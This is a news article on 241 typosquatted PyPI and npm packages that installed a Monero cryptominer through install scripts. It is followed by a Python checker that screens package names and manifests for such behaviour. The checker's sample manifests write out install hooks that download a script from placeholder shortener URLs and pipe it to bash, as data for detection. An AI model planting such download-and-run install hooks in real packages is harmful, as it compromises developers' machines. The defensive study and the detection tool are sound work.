Most of these packages are typosquats: their names mimic those of popular PyPI or npm packages so that a developer who mistypes a name installs the malicious package instead. Although the operation appears to be down as of this writing, typosquatting remains a growing threat to the developer community.
Typosquatting as the Major Technique
Despite tighter security rules, such as mandatory 2FA for high-profile accounts, the JavaScript and Python package registries are still targeted by malicious uploads. The latest campaign was spotted by security researcher Hauke Lübbers, who reported that "at least 33 projects" on PyPI carried XMRig, an open-source Monero cryptominer. These projects are mostly typosquats of popular packages such as React, argparse, and AIOHTTP, and deploy the cryptominer from their install scripts.
— Hauke Lübbers (@streamlin3d) August 17, 2022

He noticed that the threat actor was downloading a Bash cryptominer script from a remote server through the Bit.ly URL shortener, as seen below. Though that server is now down, Sonatype security researchers found a copy of it hosting the malicious scripts, and through it discovered a further 186 typosquatting packages on npm. Separately, Hauke Lübbers found another 22 PyPI packages carrying the same malicious payload. When a developer installs one of these packages, its script reports the IP address of the compromised host and the status of the cryptominer deployment back to the threat actor.

In total, the researchers found 241 malicious npm and PyPI packages carrying cryptominers, all targeting Linux machines. Although typosquatting remains a growing threat to the developer community, the registries acted quickly and removed the reported packages shortly after being notified. Developers who depend on open-source packages from PyPI and npm are still advised to check a package's name and its install-time behaviour before installing it.
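The pattern described above (a lookalike name plus an install-time hook that pulls a script from a URL shortener and hands it to a shell) is simple to screen for before running `pip install` or `npm install`. The following is an added example, not code from the article or from the researchers it cites: a small Python pre-install check that flags package names within a short edit distance of well-known packages and scans a `setup.py` or `package.json` body for install hooks, curl/wget invocations, pipes to a shell and URL-shortener hosts. The popular-package list, the shortener list and the three sample manifests are constructed for the demonstration; the `bit.ly` and `cutt.ly` paths in them are placeholders, not real URLs, and the package names in them are made up.

```python
import re

# Constructed list of well-known names that typosquats tend to imitate
# (a real deployment would load the top-N packages from the registry).
POPULAR_PACKAGES = {"react", "argparse", "aiohttp", "requests", "numpy", "lodash", "express"}

# Constructed list of URL-shortener hosts; a shortener in an install script
# hides the real payload host and lets the attacker swap the payload at will.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# setup.py cmdclass overrides / subclasses of install, and npm lifecycle scripts.
INSTALL_HOOK_RE = re.compile(
    r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop|egg_info)\s*\)"
    r"|\"(?:pre|post)install\"\s*:")
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b")
# curl ... | bash : a download piped straight into an interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z)?sh\b")
EXEC_RE = re.compile(r"\b(?:os\.system|subprocess\.(?:run|call|Popen)|child_process|exec\s*\()")


def levenshtein(a, b):
    """Plain edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Popular names within max_distance edits of `name`, nearest first (exact match excluded)."""
    name = name.lower()
    hits = [(p, levenshtein(name, p)) for p in popular if p != name]
    return sorted(((p, d) for p, d in hits if d <= max_distance), key=lambda t: (t[1], t[0]))


def scan_manifest(text):
    """Findings for a setup.py or package.json body; an empty list means nothing was flagged."""
    findings = set()
    if INSTALL_HOOK_RE.search(text):
        findings.add("install-time hook")
    if DOWNLOAD_RE.search(text):
        findings.add("downloader invoked (curl/wget)")
    if PIPE_TO_SHELL_RE.search(text):
        findings.add("download piped to shell")
    if EXEC_RE.search(text):
        findings.add("shell/process execution")
    for host in URL_RE.findall(text):
        if host.lower() in SHORTENER_HOSTS:
            findings.add("url shortener: " + host.lower())
    return sorted(findings)


def assess(name, manifest):
    """Combine name distance and manifest findings into a verdict."""
    squat = typosquat_candidates(name)
    findings = scan_manifest(manifest)
    fetches = any(f.startswith(("download", "url shortener")) for f in findings)
    if "install-time hook" in findings and fetches:
        verdict = "block"      # code runs at install time and pulls something remote
    elif squat and findings:
        verdict = "review"
    elif squat or findings:
        verdict = "warn"       # near-miss names are common among legitimate packages too
    else:
        verdict = "ok"
    return {"name": name, "lookalike_of": squat, "findings": findings, "verdict": verdict}


# Constructed sample: a setup.py in the shape the article describes (lookalike
# name, install hook, shortener URL piped to bash). The URL path is a placeholder.
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s https://bit.ly/EXAMPLE | bash")

setup(name="arparse", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an npm manifest with a preinstall lifecycle script (placeholder URL).
SUSPICIOUS_PACKAGE_JSON = '''
{"name": "lodahs", "version": "1.0.0",
 "scripts": {"preinstall": "curl -sL https://cutt.ly/EXAMPLE -o /tmp/x.sh && bash /tmp/x.sh"}}
'''

# Constructed sample: an ordinary setup.py with no install-time code.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="mytool", version="1.0", url="https://github.com/example/mytool",
      install_requires=["requests>=2.0"])
'''

if __name__ == "__main__":
    for pkg, body in (("arparse", SUSPICIOUS_SETUP_PY),
                      ("lodahs", SUSPICIOUS_PACKAGE_JSON),
                      ("mytool", BENIGN_SETUP_PY)):
        print(assess(pkg, body))
```

The check is a heuristic, not a verdict on intent: many legitimate packages sit within one or two edits of a popular name, so the name distance alone only warrants a warning, and a payload hidden behind base64 or string concatenation will slip past the regexes. The combination that the article describes, an install hook that reaches out to a URL shortener or pipes a download into a shell, is the signal worth blocking on, and a real deployment would pair it with an allowlist of known packages and the registry's own top-N list.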